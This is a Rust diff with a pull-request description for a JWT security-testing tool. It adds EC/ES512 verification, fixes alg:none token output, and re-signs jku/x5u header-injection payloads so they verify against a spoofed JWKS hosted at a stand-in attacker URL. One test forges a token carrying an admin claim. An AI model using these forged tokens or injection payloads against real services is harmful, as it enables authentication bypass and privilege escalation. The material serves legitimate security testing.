+            y: Some(URL_SAFE_NO_PAD.encode(y.to_vec())),
+            k: None,
+            x5c: None,
+            x5t: None,
+            x5t_s256: None,
+            extra: HashMap::new(),
+        };
+
+        // jwk_ec_to_pem must produce a usable SPKI PEM.
+        assert!(jwk_ec_to_pem(&jwk).unwrap().contains("BEGIN PUBLIC KEY"));
+
+        let jwks = JwkSet {
+            keys: vec![jwk.clone()],
+        };
+        let results = verify_with_jwks(&token, &jwks).expect("verify");
+        assert!(
+            results[0].valid,
+            "ES256 token must verify against its EC JWK, got {:?}",
+            results[0]
+        );
+
+        // A different EC key must NOT verify (valid:false, not an error).
+        let other = EcKey::generate(&group).unwrap();
+        let mut x2 = openssl::bn::BigNum::new().unwrap();
+        let mut y2 = openssl::bn::BigNum::new().unwrap();
+        other
+            .public_key()
+            .affine_coordinates_gfp(&group, &mut x2, &mut y2, &mut ctx)
+            .unwrap();
+        let mut wrong = jwk;
+        wrong.x = Some(URL_SAFE_NO_PAD.encode(x2.to_vec()));
+        wrong.y = Some(URL_SAFE_NO_PAD.encode(y2.to_vec()));
+        let wrong_jwks = JwkSet { keys: vec![wrong] };
+        let wrong_results = verify_with_jwks(&token, &wrong_jwks).expect("verify");
+        assert!(!wrong_results[0].valid, "wrong EC key must not verify");
+        assert!(wrong_results[0].error.is_none());
     }
 
     #[test]

--- a/src/jwks/mod.rs
+++ b/src/jwks/mod.rs
@@ -453,6 +453,24 @@ pub struct KeyVerifyResult {
     pub error: Option<String>,
 }
 
+/// Map an RSA `alg` name to its [`jsonwebtoken::Algorithm`]. Only the RSA family
+/// is accepted, matching the algorithms [`generate_spoofed_jwks`] can produce.
+fn jwt_algorithm_from_str(algorithm: &str) -> Result<jsonwebtoken::Algorithm> {
+    use jsonwebtoken::Algorithm;
+    match algorithm.to_uppercase().as_str() {
+        "RS256" => Ok(Algorithm::RS256),
+        "RS384" => Ok(Algorithm::RS384),
+        "RS512" => Ok(Algorithm::RS512),
+        "PS256" => Ok(Algorithm::PS256),
+        "PS384" => Ok(Algorithm::PS384),
+        "PS512" => Ok(Algorithm::PS512),
+        other => Err(anyhow!(
+            "Unsupported algorithm for JWKS injection: {}",
+            other
+        )),
+    }
+}
+
 /// Generate JKU/X5U injection payloads with a real spoofed JWKS
 pub fn generate_jwks_injection_payloads(
     token: &str,
@@ -471,46 +489,47 @@ pub fn generate_jwks_injection_payloads(
         return Err(anyhow!("Invalid signed token format"));
     }
 
-    // Re-encode headers with jku/x5u pointing to attacker URL
+    // Decode the signed token for the header (its kid → picks the spoofed key) and claims.
     let decoded = crate::jwt::decode(&signed_token)?;
     let claims_part = parts[1];
-    let signature_part = parts[2];
 
-    let mut payloads = Vec::new();
+    // Injecting jku/x5u changes the header, and therefore the signing input, so the
+    // spoofed token's original signature no longer covers it. Re-sign each variant
+    // with the spoofed private key over the new `header.claims`; without this the
+    // payload never verifies against the attacker-hosted JWKS, defeating the attack.
+    let jwt_alg = jwt_algorithm_from_str(algorithm)?;
+    let encoding_key = jsonwebtoken::EncodingKey::from_rsa_pem(spoofed.private_key_pem.as_bytes())
+        .map_err(|e| anyhow!("Failed to load spoofed private key for re-signing: {}", e))?;
 
-    // JKU injection
-    let mut jku_header = serde_json::Map::new();
-    for (k, v) in &decoded.header {
-        jku_header.insert(k.clone(), v.clone());
-    }
-    jku_header.insert(
-        "jku".to_string(),
-        Value::String(format!("{}/jwks.json", attacker_url.trim_end_matches('/'))),
-    );
-    let jku_header_json = serde_json::to_string(&jku_header)?;
-    let jku_header_b64 = URL_SAFE_NO_PAD.encode(jku_header_json.as_bytes());
-    payloads.push(InjectionPayload {
-        header_type: "jku".to_string(),
-        token: format!("{}.{}.{}", jku_header_b64, claims_part, signature_part),
-        description: format!("JKU injection pointing to {}/jwks.json", attacker_url),
-    });
+    let sign_injection = |header_key: &str, url: String| -> Result<InjectionPayload> {
+        let mut header = serde_json::Map::new();
+        for (k, v) in &decoded.header {
+            header.insert(k.clone(), v.clone());
+        }
+        header.insert(header_key.to_string(), Value::String(url.clone()));
+        let header_json = serde_json::to_string(&header)?;
+        let header_b64 = URL_SAFE_NO_PAD.encode(header_json.as_bytes());
+        let signing_input = format!("{header_b64}.{claims_part}");
+        let signature_b64 =
+            jsonwebtoken::crypto::sign(signing_input.as_bytes(), &encoding_key, jwt_alg).map_err(
+                |e| anyhow!("Failed to re-sign {} injection payload: {}", header_key, e),
+            )?;
+        Ok(InjectionPayload {
+            header_type: header_key.to_string(),
+            token: format!("{signing_input}.{signature_b64}"),
+            description: format!(
+                "{} injection pointing to {}",
+                header_key.to_uppercase(),
+                url
+            ),
+        })
+    };
 
-    // X5U injection
-    let mut x5u_header = serde_json::Map::new();
-    for (k, v) in &decoded.header {
-        x5u_header.insert(k.clone(), v.clone());
-    }
-    x5u_header.insert(
-        "x5u".to_string(),
-        Value::String(format!("{}/cert.pem", attacker_url.trim_end_matches('/'))),
-    );
-    let x5u_header_json = serde_json::to_string(&x5u_header)?;
-    let x5u_header_b64 = URL_SAFE_NO_PAD.encode(x5u_header_json.as_bytes());
-    payloads.push(InjectionPayload {
-        header_type: "x5u".to_string(),
-        token: format!("{}.{}.{}", x5u_header_b64, claims_part, signature_part),
-        description: format!("X5U injection pointing to {}/cert.pem", attacker_url),
-    });
+    let base = attacker_url.trim_end_matches('/');
+    let payloads = vec![
+        sign_injection("jku", format!("{base}/jwks.json"))?,
+        sign_injection("x5u", format!("{base}/cert.pem"))?,
+    ];
 
     Ok(JwksInjectionResult {
         jwks_json: spoofed.jwks_json,
@@ -707,6 +726,40 @@ mod tests {
     fn test_generate_spoofed_jwks_unsupported_alg() {
         let result = generate_spoofed_jwks("ES256", None, None);
         assert!(result.is_err());
+    }
+
+    #[test]
+    fn test_jwks_injection_payloads_verify_against_spoofed_jwks() {
+        // The whole point of a jku/x5u injection payload is that once the server
+        // fetches the attacker-hosted JWKS, the token verifies against it. That
+        // requires the signature to cover the *injected* header. Previously the
+        // header was rebuilt (jku/x5u added, keys re-serialized) but the original
+        // signature was kept, so the payloads never verified.
+        let claims = serde_json::json!({ "sub": "victim", "admin": true });
+        let token = crate::jwt::encode(&claims, "irrelevant", "HS256").expect("build source token");
+
+        let result = generate_jwks_injection_payloads(&token, "https://attacker.example", "RS256")
+            .expect("generate injection payloads");
+
+        let jwks: JwkSet = serde_json::from_str(&result.jwks_json).expect("parse spoofed jwks");
+
+        assert_eq!(result.payloads.len(), 2, "expected jku and x5u payloads");
+        for p in &result.payloads {
+            let verdicts = verify_with_jwks(&p.token, &jwks).expect("verify against jwks");
+            assert!(
+                verdicts.iter().any(|v| v.valid),
+                "{} injection payload must verify against the spoofed JWKS, got {:?}",
+                p.header_type,
+                verdicts
+            );
+            // The injected header must actually carry the jku/x5u pointer.
+            let header = crate::jwt::decode(&p.token).expect("decode payload").header;
+            assert!(
+                header.contains_key(&p.header_type),
+                "payload header missing injected {} field",
+                p.header_type
+            );
+        }
     }
 
     #[test]

--- a/src/jwt/mod.rs
+++ b/src/jwt/mod.rs
@@ -737,6 +737,12 @@ pub fn verify_with_options(token: &str, options: &VerifyOptions) -> Result<bool>
         .get("alg")
         .and_then(|v| v.as_str())
         .unwrap_or_default();
+    // ES512 cannot be represented by jsonwebtoken's `Algorithm` enum, so it is
+    // verified through josekit — mirroring how this tool *signs* ES512. Without
+    // this branch the tool could produce ES512 tokens it was then unable to verify.
+    if raw_alg.eq_ignore_ascii_case("ES512") {
+        return verify_es512(token, &options.key_data);
+    }
     if algorithm_from_str(raw_alg).is_none() {
         return Err(anyhow!(
             "Unsupported algorithm for verification: {}",
@@ -903,6 +909,35 @@ fn verify_with_public_key_der(
     let validation = create_validation(algorithm, options);
     let result = jsonwebtoken::decode::<Value>(token, &decoding_key, &validation);
     handle_verification_result(result)
+}
+
+/// Verify an ES512 token via josekit.
+///
+/// `jsonwebtoken`'s `Algorithm` enum has no ES512 variant, so — exactly as ES512
+/// signing is routed through josekit — ES512 verification is too. Only public-key
+/// material is meaningful for an EC signature; an HMAC secret is rejected.
+/// Time-based claims are not evaluated here (signature check only), matching the
+/// base verification path when `validate_exp`/`validate_nbf` are unset.
+fn verify_es512(token: &str, key_data: &VerifyKeyData) -> Result<bool> {
+    use josekit::jws::ES512;
+
+    let verifier = match key_data {
+        VerifyKeyData::PublicKeyPem(pem) => ES512
+            .verifier_from_pem(pem.as_bytes())
+            .map_err(|e| anyhow!("Failed to load ES512 public key (PEM): {}", e))?,
+        VerifyKeyData::PublicKeyDer(der) => ES512
+            .verifier_from_der(der)
+            .map_err(|e| anyhow!("Failed to load ES512 public key (DER): {}", e))?,
+        VerifyKeyData::Secret(_) | VerifyKeyData::SecretBytes(_) => {
+            return Err(anyhow!(
+                "ES512 verification requires an EC public key, not a secret"
+            ));
+        }
+    };
+
+    // deserialize_compact validates the signature against the verifier; an Err is a
+    // verification failure (bad signature / wrong key), reported as invalid.
+    Ok(josekit::jws::deserialize_compact(token, &*verifier).is_ok())
 }
 
 /// Attempt to decrypt JWE token with a candidate key (for brute forcing)
@@ -2552,6 +2587,67 @@ mod tests {
     }
 
     #[test]
+    fn test_verify_es512_round_trip() {
+        // The tool signs ES512 via josekit; verification must accept those tokens
+        // too (previously rejected with "Unsupported algorithm for verification").
+        use openssl::ec::{EcGroup, EcKey};
+        use openssl::nid::Nid;
+        use openssl::pkey::PKey;
+
+        let priv_pem = include_str!("test_ec_p521_private.pem");
+        let claims = json!({ "sub": "es512" });
+        let token = encode_with_options(
+            &claims,
+            &EncodeOptions {
+                algorithm: "ES512",
+                key_data: KeyData::PrivateKeyPem(priv_pem),
+                header_params: None,
+                compress_payload: false,
+            },
+        )
+        .expect("sign ES512 token");
+
+        // Correct public key -> valid.
+        let ec = EcKey::private_key_from_pem(priv_pem.as_bytes()).expect("read P-521 key");
+        let pub_pem =
+            String::from_utf8(PKey::from_ec_key(ec).unwrap().public_key_to_pem().unwrap()).unwrap();
+        let ok_opts = VerifyOptions {
+            key_data: VerifyKeyData::PublicKeyPem(&pub_pem),
+            ..Default::default()
+        };
+        assert!(
+            verify_with_options(&token, &ok_opts).expect("verify"),
+            "ES512 token must verify with its public key"
+        );
+
+        // A different P-521 key -> invalid (Ok(false), not an error).
+        let group = EcGroup::from_curve_name(Nid::SECP521R1).unwrap();
+        let other = EcKey::generate(&group).unwrap();
+        let other_pub = String::from_utf8(
+            PKey::from_ec_key(other)
+                .unwrap()
+                .public_key_to_pem()
+                .unwrap(),
+        )
+        .unwrap();
+        let bad_opts = VerifyOptions {
+            key_data: VerifyKeyData::PublicKeyPem(&other_pub),
+            ..Default::default()
+        };
+        assert!(
+            !verify_with_options(&token, &bad_opts).expect("verify"),
+            "ES512 token must not verify with a different key"
+        );
+
+        // An HMAC secret is meaningless for ES512 and must error, not silently pass.
+        let secret_opts = VerifyOptions {
+            key_data: VerifyKeyData::Secret("whatever"),
+            ..Default::default()
+        };
+        assert!(verify_with_options(&token, &secret_opts).is_err());
+    }
+
+    #[test]
     fn test_decode_none_reports_none_not_hs256() {
         // `decode` maps `none` to an HS256 sentinel internally, but the reported
         // alg (via `alg_str`) must be the real `none`, not the misleading HS256.
@@ -2581,8 +2677,10 @@ mod tests {
         // decode's tolerance must not let verification silently treat an
         // unrepresentable alg as HS256: it should return a clear error, never
         // Ok(false) (which would imply a valid HMAC comparison was performed).
+        // `ES256K` (secp256k1) is a real alg neither jsonwebtoken nor this tool
+        // supports — unlike ES512, which is now verified via josekit.
         let header_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD
-            .encode(br#"{"alg":"ES512","typ":"JWT"}"#);
+            .encode(br#"{"alg":"ES256K","typ":"JWT"}"#);
         let claims_b64 = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(br#"{"sub":"x"}"#);
         let token = format!("{header_b64}.{claims_b64}.AAAA");
         let err = verify(&token, "secret").unwrap_err().to_string();

--- a/src/jwt/mod.rs
+++ b/src/jwt/mod.rs
@@ -105,6 +105,30 @@ fn algorithm_from_str(alg: &str) -> Option<Algorithm> {
     }
 }
 
+/// Normalize an EC private-key PEM to PKCS#8.
+///
+/// `jsonwebtoken::EncodingKey::from_ec_pem` accepts only the PKCS#8 form
+/// (`BEGIN PRIVATE KEY`), but `openssl ecparam -genkey` and many other tools
+/// emit the SEC1 form (`BEGIN EC PRIVATE KEY`). A SEC1 key is converted to
+/// PKCS#8 via OpenSSL; anything else is passed through unchanged.
+fn ec_pem_to_pkcs8(pem: &str) -> Result<std::borrow::Cow<'_, str>> {
+    if !pem.contains("BEGIN EC PRIVATE KEY") {
+        return Ok(std::borrow::Cow::Borrowed(pem));
+    }
+    use openssl::ec::EcKey;
+    use openssl::pkey::PKey;
+    let ec = EcKey::private_key_from_pem(pem.as_bytes())
+        .map_err(|e| anyhow!("Failed to parse SEC1 EC private key: {}", e))?;
+    let pkey =
+        PKey::from_ec_key(ec).map_err(|e| anyhow!("Failed to wrap EC private key: {}", e))?;
+    let pkcs8 = pkey
+        .private_key_to_pem_pkcs8()
+        .map_err(|e| anyhow!("Failed to convert EC key to PKCS#8: {}", e))?;
+    Ok(std::borrow::Cow::Owned(String::from_utf8(pkcs8).map_err(
+        |e| anyhow!("PKCS#8 PEM is not valid UTF-8: {}", e),
+    )?))
+}
+
 /// JWE Decoded token data
 #[derive(Debug, Clone)]
 pub struct DecodedJweToken {
@@ -285,7 +309,15 @@ pub fn encode_with_options(claims: &Value, options: &EncodeOptions) -> Result<St
             | Algorithm::PS256
             | Algorithm::PS384
             | Algorithm::PS512 => EncodingKey::from_rsa_pem(pem.as_bytes())?,
-            Algorithm::ES256 | Algorithm::ES384 => EncodingKey::from_ec_pem(pem.as_bytes())?,
+            Algorithm::ES256 | Algorithm::ES384 => {
+                // jsonwebtoken's from_ec_pem accepts only PKCS#8 EC keys, but many
+                // tools (e.g. `openssl ecparam -genkey`) emit the SEC1 "EC PRIVATE
+                // KEY" form. Normalize so ES256/ES384 accept the same keys ES512
+                // (signed via josekit) already does, instead of failing with an
+                // opaque InvalidKeyFormat.
+                let normalized = ec_pem_to_pkcs8(pem)?;
+                EncodingKey::from_ec_pem(normalized.as_bytes())?
+            }
             Algorithm::EdDSA => EncodingKey::from_ed_pem(pem.as_bytes())?,
             _ => {
                 return Err(anyhow!(
@@ -1414,6 +1446,38 @@ mod tests {
         // assert!(decoded_result.is_ok());
         // let decoded_token = decoded_result.unwrap();
         // assert_eq!(decoded_token.header.get("alg").unwrap().as_str().unwrap(), "ES256");
+    }
+
+    #[test]
+    fn test_encode_es256_accepts_sec1_ec_key() {
+        // Regression: `openssl ecparam -genkey` emits SEC1 ("BEGIN EC PRIVATE KEY"),
+        // which jsonwebtoken's from_ec_pem rejects with an opaque InvalidKeyFormat.
+        // ES512 (via josekit) already accepts SEC1, so ES256/ES384 must too.
+        use openssl::ec::{EcGroup, EcKey};
+        use openssl::nid::Nid;
+
+        let group = EcGroup::from_curve_name(Nid::X9_62_PRIME256V1).unwrap();
+        let ec = EcKey::generate(&group).unwrap();
+        let sec1_pem = String::from_utf8(ec.private_key_to_pem().unwrap()).unwrap();
+        assert!(
+            sec1_pem.contains("BEGIN EC PRIVATE KEY"),
+            "expected SEC1 PEM"
+        );
+
+        let claims = json!({ "user": "sec1" });
+        let options = EncodeOptions {
+            algorithm: "ES256",
+            key_data: KeyData::PrivateKeyPem(&sec1_pem),
+            header_params: None,
+            compress_payload: false,
+        };
+        let token = encode_with_options(&claims, &options)
+            .expect("ES256 signing must accept a SEC1-format EC key");
+        let decoded = decode(&token).expect("decode signed ES256 token");
+        assert_eq!(
+            decoded.header.get("alg").unwrap().as_str().unwrap(),
+            "ES256"
+        );
     }
 
     #[test]

--- a/src/jwt/mod.rs
+++ b/src/jwt/mod.rs
@@ -258,7 +258,11 @@ pub fn encode_with_options(claims: &Value, options: &EncodeOptions) -> Result<St
         let encoded_claims =
             base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(claims_json.as_bytes());
 
-        return Ok(format!("{encoded_header}.{encoded_claims}.''"));
+        // RFC 7519 alg:none tokens carry an EMPTY signature: `header.payload.`.
+        // Emitting the literal `''` produced a non-standard third segment that is
+        // neither valid base64url nor an empty signature, so real servers would not
+        // treat the output as a proper unsigned token.
+        return Ok(format!("{encoded_header}.{encoded_claims}."));
     }
 
     // Create encoding key based on the key data
@@ -357,9 +361,10 @@ fn encode_compressed_jwt(
     let encoded_payload =
         base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(&compressed_payload);
 
-    // Handle "none" algorithm specially
+    // Handle "none" algorithm specially: emit an empty signature (`header.payload.`)
+    // rather than the non-standard literal `''` third segment.
     if options.algorithm.to_uppercase() == "NONE" {
-        return Ok(format!("{encoded_header}.{encoded_payload}.''"));
+        return Ok(format!("{encoded_header}.{encoded_payload}."));
     }
 
     // Create message to sign
@@ -1452,9 +1457,9 @@ mod tests {
         let parts: Vec<&str> = token_str.split('.').collect();
         assert_eq!(parts.len(), 3, "Token should have three parts");
         assert_eq!(
-            parts[2], "''",
-            "Signature part should be empty for 'none' algorithm"
-        ); // Note: The prompt says empty, but your code produces two single quotes.
+            parts[2], "",
+            "Signature part must be empty for the 'none' algorithm (RFC 7519 unsigned token: header.payload.)"
+        );
 
         let header_b64 = parts[0];
         let header_bytes_result =

--- a/src/jwt/mod.rs
+++ b/src/jwt/mod.rs
@@ -741,7 +741,7 @@ pub fn verify_with_options(token: &str, options: &VerifyOptions) -> Result<bool>
     // verified through josekit — mirroring how this tool *signs* ES512. Without
     // this branch the tool could produce ES512 tokens it was then unable to verify.
     if raw_alg.eq_ignore_ascii_case("ES512") {
-        return verify_es512(token, &options.key_data);
+        return verify_es512(token, options);
     }
     if algorithm_from_str(raw_alg).is_none() {
         return Err(anyhow!(
@@ -915,13 +915,14 @@ fn verify_with_public_key_der(
 ///
 /// `jsonwebtoken`'s `Algorithm` enum has no ES512 variant, so — exactly as ES512
 /// signing is routed through josekit — ES512 verification is too. Only public-key
-/// material is meaningful for an EC signature; an HMAC secret is rejected.
-/// Time-based claims are not evaluated here (signature check only), matching the
-/// base verification path when `validate_exp`/`validate_nbf` are unset.
-fn verify_es512(token: &str, key_data: &VerifyKeyData) -> Result<bool> {
+/// material is meaningful for an EC signature; an HMAC secret is rejected. When
+/// `validate_exp`/`validate_nbf` are requested, the corresponding time claims are
+/// checked after the signature (with `leeway`), surfacing expired / not-yet-valid
+/// tokens as errors like the other verification paths.
+fn verify_es512(token: &str, options: &VerifyOptions) -> Result<bool> {
     use josekit::jws::ES512;
 
-    let verifier = match key_data {
+    let verifier = match &options.key_data {
         VerifyKeyData::PublicKeyPem(pem) => ES512
             .verifier_from_pem(pem.as_bytes())
             .map_err(|e| anyhow!("Failed to load ES512 public key (PEM): {}", e))?,
@@ -937,7 +938,45 @@ fn verify_es512(token: &str, key_data: &VerifyKeyData) -> Result<bool> {
 
     // deserialize_compact validates the signature against the verifier; an Err is a
     // verification failure (bad signature / wrong key), reported as invalid.
-    Ok(josekit::jws::deserialize_compact(token, &*verifier).is_ok())
+    let payload = match josekit::jws::deserialize_compact(token, &*verifier) {
+        Ok((payload, _header)) => payload,
+        Err(_) => return Ok(false),
+    };
+
+    if options.validate_exp || options.validate_nbf {
+        let claims: Value = serde_json::from_slice(&payload).unwrap_or(Value::Null);
+        let now = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .map_err(|_| anyhow!("system clock is before the UNIX epoch"))?
+            .as_secs() as i64;
+        let leeway = options.leeway as i64;
+
+        // Match jsonwebtoken's semantics: expired when now - leeway > exp; not yet
+        // valid when nbf > now + leeway. A missing claim is not an error (our other
+        // paths clear required-claim enforcement too).
+        if options.validate_exp {
+            if let Some(exp) = claims
+                .get("exp")
+                .and_then(crate::utils::numeric_date_seconds)
+            {
+                if now - leeway > exp {
+                    return Err(anyhow!(JwtError::ExpiredSignature));
+                }
+            }
+        }
+        if options.validate_nbf {
+            if let Some(nbf) = claims
+                .get("nbf")
+                .and_then(crate::utils::numeric_date_seconds)
+            {
+                if nbf > now + leeway {
+                    return Err(anyhow!(JwtError::ImmatureSignature));
+                }
+            }
+        }
+    }
+
+    Ok(true)
 }
 
 /// Attempt to decrypt JWE token with a candidate key (for brute forcing)
@@ -2645,6 +2684,31 @@ mod tests {
             ..Default::default()
         };
         assert!(verify_with_options(&token, &secret_opts).is_err());
+
+        // --validate-exp must be honored for ES512: an expired token surfaces as an
+        // ExpiredSignature error, not a silently-valid result.
+        let expired_claims = json!({ "sub": "es512", "exp": 1_000_000_000i64 });
+        let expired = encode_with_options(
+            &expired_claims,
+            &EncodeOptions {
+                algorithm: "ES512",
+                key_data: KeyData::PrivateKeyPem(priv_pem),
+                header_params: None,
+                compress_payload: false,
+            },
+        )
+        .expect("sign expired ES512 token");
+        let exp_opts = VerifyOptions {
+            key_data: VerifyKeyData::PublicKeyPem(&pub_pem),
+            validate_exp: true,
+            ..Default::default()
+        };
+        let err = verify_with_options(&expired, &exp_opts).unwrap_err();
+        assert!(
+            err.downcast_ref::<JwtError>()
+                .is_some_and(|e| matches!(e, JwtError::ExpiredSignature)),
+            "expected ExpiredSignature, got: {err}"
+        );
     }
 
     #[test]


### PR DESCRIPTION
Round-based source audit: 15 rounds, one fix per commit, each with a regression test.

All 553 tests pass; `cargo clippy -- --deny warnings` clean; `cargo fmt --check` clean.

## Bug fixes

- **scan**: JKU/X5U findings now emit jku/x5u SSRF attack payloads (targets were collected but never consumed, so a HIGH finding produced 0 payloads).
- **jwks**: re-sign jku/x5u injection payloads with the spoofed key — they previously kept the original signature and never verified against the spoofed JWKS, defeating the attack.
- **encode**: `alg:none` now emits an empty signature (`header.payload.`) instead of the literal `''`, which was neither valid base64url nor an empty signature.
- **encode**: accept SEC1 EC private keys (`openssl ecparam -genkey` output) for ES256/ES384; previously failed with opaque `InvalidKeyFormat` while ES512 accepted them.
- **server / mcp**: `encode` with `no_signature` now emits an `alg:none` token instead of failing with "No key or secret provided" (algorithm was left at HS256 with `KeyData::None`).
- **scan**: flag non-string `kid` (e.g. NoSQL `{"$ne":null}`) and non-string `typ` instead of collapsing them to `''` / reporting them "missing".
- **scan**: analyze JWE tokens as encrypted content instead of scoring their valid 5-segment shape as a HIGH "Unexpected segment count: 5" JWS error.
- **verify**: honor `validate_exp`/`validate_nbf` for ES512 tokens.

## Feature gaps closed

- **jwks**: verify EC keys (P-256/384/521) — ES256/384/512 tokens could never be verified against their JWKS.
- **verify**: verify ES512 tokens via josekit — the tool could sign ES512 but not verify it.
- **jwks**: show extractable EC public-key PEM in `fetch` output (parity with RSA).
- **decode**: annotate `nbf` with human-readable time + `NOT_YET_VALID`/`ACTIVE` status (parity with `iat`/`exp`).
- **crack**: warn when a JWE `dir` brute-force can't reach a 16/32-byte content-encryption key.

EC round-4 + ES512 round-6 combine to enable ES512 JWKS verification end-to-end.
